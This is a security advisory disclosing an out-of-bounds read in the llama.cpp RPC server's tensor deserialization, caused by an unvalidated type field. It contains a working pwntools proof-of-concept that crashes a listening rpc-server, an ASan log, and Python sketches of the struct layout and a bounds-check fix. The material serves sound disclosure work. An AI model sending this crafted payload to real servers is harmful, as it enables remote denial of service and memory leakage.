global-buffer-overflow in ggml_type_size
Summary
The type member of the rpc_tensor structure is not validated, so an out-of-range value can cause a global-buffer-overflow.
Details
First, note that the type member of the rpc_tensor structure can be controlled by the user.
// ggml_tensor is serialized into rpc_tensor
#pragma pack(push, 1)
struct rpc_tensor {
    uint64_t id;
    uint32_t type;
    uint64_t buffer;
    uint32_t ne[GGML_MAX_DIMS];
    uint32_t nb[GGML_MAX_DIMS];
    uint32_t op;
    int32_t  op_params[GGML_MAX_OP_PARAMS / sizeof(int32_t)];
    int32_t  flags;
    uint64_t src[GGML_MAX_SRC];
    uint64_t view_src;
    uint64_t view_offs;
    uint64_t data;
    char name[GGML_MAX_NAME];
    char padding[4];
};
#pragma pack(pop)
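To make the wire layout concrete, here is a minimal Python sketch that computes the byte offset of each field in the packed structure. The constant values (GGML_MAX_DIMS = 4, GGML_MAX_OP_PARAMS = 64, GGML_MAX_SRC = 10, GGML_MAX_NAME = 64) are assumptions inferred from the field counts used in the PoC script, and little-endian byte order is assumed as on x86-64. The helper name field_offsets is illustrative only.

```python
import struct

# Assumed ggml constants, inferred from the field counts used in the PoC.
GGML_MAX_DIMS = 4
GGML_MAX_OP_PARAMS = 64
GGML_MAX_SRC = 10
GGML_MAX_NAME = 64

# Field name and struct format code, in declaration order.
RPC_TENSOR_FIELDS = [
    ("id", "Q"),
    ("type", "I"),
    ("buffer", "Q"),
    ("ne", f"{GGML_MAX_DIMS}I"),
    ("nb", f"{GGML_MAX_DIMS}I"),
    ("op", "I"),
    ("op_params", f"{GGML_MAX_OP_PARAMS // 4}i"),
    ("flags", "i"),
    ("src", f"{GGML_MAX_SRC}Q"),
    ("view_src", "Q"),
    ("view_offs", "Q"),
    ("data", "Q"),
    ("name", f"{GGML_MAX_NAME}s"),
    ("padding", "4s"),
]

def field_offsets(fields):
    """Return ({name: byte offset}, total size) for a packed layout."""
    offsets, pos = {}, 0
    for name, fmt in fields:
        offsets[name] = pos
        # "<" means little-endian with no alignment padding,
        # which mirrors #pragma pack(push, 1).
        pos += struct.calcsize("<" + fmt)
    return offsets, pos

RPC_TENSOR_OFFSETS, RPC_TENSOR_SIZE = field_offsets(RPC_TENSOR_FIELDS)
print(RPC_TENSOR_OFFSETS["type"], RPC_TENSOR_SIZE)  # 8 296
```

Under these assumptions the attacker-controlled type field sits at byte offset 8 of a 296-byte structure, directly after id.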
By controlling the value of type, we can trigger a global-buffer-overflow during the following call.
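The following is the function call chain that leads to the global-buffer-overflow (the last four frames are taken from the ASan trace below):
- start_rpc_server
- rpc_serve_client
- rpc_server::get_tensor
- rpc_server::deserialize_tensor
- ggml_new_tensor_4d
- ggml_new_tensor
- ggml_row_size
- ggml_type_size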
GGML_CALL size_t ggml_type_size(enum ggml_type type) {
    return type_traits[type].type_size; // type is used as an array index without being validated or sanitized
}
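One way to close the hole is to reject an out-of-range type before it is ever used as an index. The sketch below models that check in Python on the serialized bytes; it is not the project's actual patch. The offset of 8 assumes the packed rpc_tensor layout (type follows the 8-byte id), little-endian byte order is assumed, and EXAMPLE_TYPE_COUNT is a hypothetical stand-in for the real number of entries in type_traits.

```python
import struct

TYPE_OFFSET = 8  # assumed: `type` follows the 8-byte `id` in the packed struct

def tensor_type_is_valid(raw_tensor: bytes, type_count: int) -> bool:
    """Return True only if the serialized `type` can safely index a
    table that has `type_count` entries."""
    if len(raw_tensor) < TYPE_OFFSET + 4:
        return False  # too short to contain the field at all
    (type_id,) = struct.unpack_from("<I", raw_tensor, TYPE_OFFSET)
    return type_id < type_count

# Hypothetical table size, for illustration only.
EXAMPLE_TYPE_COUNT = 32

benign = struct.pack("<QI", 1, 0)       # id = 1, type = 0
hostile = struct.pack("<QI", 1, 0x100)  # id = 1, type = 0x100 as in the PoC

print(tensor_type_is_valid(benign, EXAMPLE_TYPE_COUNT))   # True
print(tensor_type_is_valid(hostile, EXAMPLE_TYPE_COUNT))  # False
```

In the C++ server the equivalent check would compare the deserialized type against the number of known types before any ggml function receives it.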
PoC
Build
git clone https://github.com/ggerganov/llama.cpp.git && cd llama.cpp && mkdir build-rpc && cd build-rpc && cmake .. -DGGML_RPC=ON && cmake --build . --config Release
pip install pwn
Reproduce
In llama/llama.cpp/build-rpc/bin, start the RPC server (the ASan log below shows it being launched as ./rpc-server -p 50052).
Then run the following Python script, which sets type to 0x100:
from pwn import *
ALLOC_BUFFER = 0
GET_ALIGNMENT = 1
GET_MAX_SIZE = 2
BUFFER_GET_BASE = 3
FREE_BUFFER = 4
BUFFER_CLEAR = 5
SET_TENSOR = 6
GET_TENSOR = 7
COPY_TENSOR = 8
GRAPH_COMPUTE = 9
GET_DEVICE_MEMORY = 10
context(arch='amd64', log_level='debug')
p = remote("127.0.0.1", 50052)
pd = b''
# Serialized rpc_tensor; the fields follow the order of the struct definition
rpc_tensor_pd = flat(
    {
        0: [
            0x1,              # id (packed as 8 bytes because arch is amd64)
            p32(0x100),       # type: out-of-range value that triggers the bug
            p64(0xdeadbeef),  # buffer
            [                 # ne
                p32(0xdeadbeef),
                p32(0xdeadbeef),
                p32(0xdeadbeef),
                p32(0xdeadbeef),
            ],
            [                 # nb
                p32(1),
                p32(1),
                p32(1),
                p32(1),
            ],
            p32(0),           # op
            [p32(0)] * 16,    # op_params (16 x int32)
            p32(0),           # flags
            [p64(0)] * 10,    # src
            p64(0),           # view_src
            p64(0),           # view_offs
            p64(0xdeadbeef),  # data
            b'a' * 64,        # name
            b'x' * 4          # padding
        ],
    }
)
cmd = p8(GET_TENSOR)
# GET_TENSOR input: the tensor followed by two 64-bit values (offset = 0, size = 0x100)
content = flat(
    {
        0: rpc_tensor_pd + p64(0) + p64(0x100)
    }
)
input_size = p64(len(content))
# Message framing: 1-byte command, 8-byte input size, then the input itself
pd += cmd + input_size + content
p.send(pd)
p.recvall(timeout=1)
p.close()
The server then aborts with a global-buffer-overflow.
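For readers without pwntools, the message framing used by the script can be sketched with the standard library alone. The layout below (1-byte command, 8-byte little-endian length, then the payload) is read off the PoC; the helper names are hypothetical, the interpretation of the two trailing 64-bit values as offset and size is an assumption, and the 296-byte tensor size assumes GGML_MAX_DIMS = 4, GGML_MAX_OP_PARAMS = 64, GGML_MAX_SRC = 10 and GGML_MAX_NAME = 64.

```python
import struct

GET_TENSOR = 7  # command id, as defined in the PoC

def frame_rpc_message(cmd: int, payload: bytes) -> bytes:
    """Prefix the payload with a 1-byte command and an 8-byte
    little-endian payload length."""
    return struct.pack("<BQ", cmd, len(payload)) + payload

def get_tensor_payload(raw_tensor: bytes, offset: int, size: int) -> bytes:
    """Append two 64-bit little-endian values (assumed to be offset
    and size) to a serialized tensor."""
    return raw_tensor + struct.pack("<QQ", offset, size)

# Placeholder tensor: 296 zero bytes, the assumed size of the packed struct.
placeholder_tensor = bytes(296)
message = frame_rpc_message(
    GET_TENSOR, get_tensor_payload(placeholder_tensor, 0, 0x100)
)
print(len(message))  # 321 = 1 + 8 + 296 + 16
```

Sending such a message over a plain socket to the server's port would exercise the same code path as the pwntools script, provided the tensor bytes carry the out-of-range type.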
Asan log
➜ bin git:(master) ✗ ./rpc-server -p 50052
create_backend: using CPU backend
Starting RPC server on 0.0.0.0:50052, backend memory: 7896 MB
Accepted client connection, free_mem=8280244224, total_mem=8280244224
=================================================================
==14276==ERROR: AddressSanitizer: global-buffer-overflow on address 0x738b419e94d8 at pc 0x738b4183cad9 bp 0x7fffe4a5ac50 sp 0x7fffe4a5ac40
READ of size 8 at 0x738b419e94d8 thread T0
#0 0x738b4183cad8 in ggml_type_size (/home/heckar/AI-Sec/llama/llama.cpp/build-rpc-asan-debug/ggml/src/libggml.so+0x3cad8)
#1 0x738b418467b5 in ggml_row_size (/home/heckar/AI-Sec/llama/llama.cpp/build-rpc-asan-debug/ggml/src/libggml.so+0x467b5)
#2 0x738b41863fdd in ggml_new_tensor (/home/heckar/AI-Sec/llama/llama.cpp/build-rpc-asan-debug/ggml/src/libggml.so+0x63fdd)
#3 0x738b41864a2b in ggml_new_tensor_4d (/home/heckar/AI-Sec/llama/llama.cpp/build-rpc-asan-debug/ggml/src/libggml.so+0x64a2b)
#4 0x738b41944ee6 in rpc_server::deserialize_tensor(ggml_context*, rpc_tensor const*) (/home/heckar/AI-Sec/llama/llama.cpp/build-rpc-asan-debug/ggml/src/libggml.so+0x144ee6)
#5 0x738b41949f1f in rpc_server::get_tensor(std::vector<unsigned char, std::allocator<unsigned char> > const&, std::vector<unsigned char, std::allocator<unsigned char> >&) (/home/heckar/AI-Sec/llama/llama.cpp/build-rpc-asan-debug/ggml/src/libggml.so+0x149f1f)
#6 0x738b41957642 in start_rpc_server (/home/heckar/AI-Sec/llama/llama.cpp/build-rpc-asan-debug/ggml/src/libggml.so+0x157642)
#7 0x5c8d5aeeec63 in main (/home/heckar/AI-Sec/llama/llama.cpp/build-rpc-asan-debug/bin/rpc-server+0x2c63)
#8 0x738b41029d8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
#9 0x738b41029e3f in __libc_start_main_impl ../csu/libc-start.c:392
#10 0x5c8d5aeeeff4 in _start (/home/heckar/AI-Sec/llama/llama.cpp/build-rpc-asan-debug/bin/rpc-server+0x2ff4)
Address 0x738b419e94d8 is a wild pointer.
SUMMARY: AddressSanitizer: global-buffer-overflow (/home/heckar/AI-Sec/llama/llama.cpp/build-rpc-asan-debug/ggml/src/libggml.so+0x3cad8) in ggml_type_size
Shadow bytes around the buggy address:
0x0e71e8335240: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
0x0e71e8335250: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
0x0e71e8335260: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
0x0e71e8335270: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
0x0e71e8335280: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
=>0x0e71e8335290: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9[f9]f9 f9 f9 f9
0x0e71e83352a0: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
0x0e71e83352b0: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
0x0e71e83352c0: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
0x0e71e83352d0: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
0x0e71e83352e0: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==14276==ABORTING
Impact
This vulnerability is an out-of-bounds read past the type_traits table and may lead to memory data leakage.
Credit
This vulnerability was discovered by 7resp4ss and Guang Gong from 360 Vulnerability Research Institute.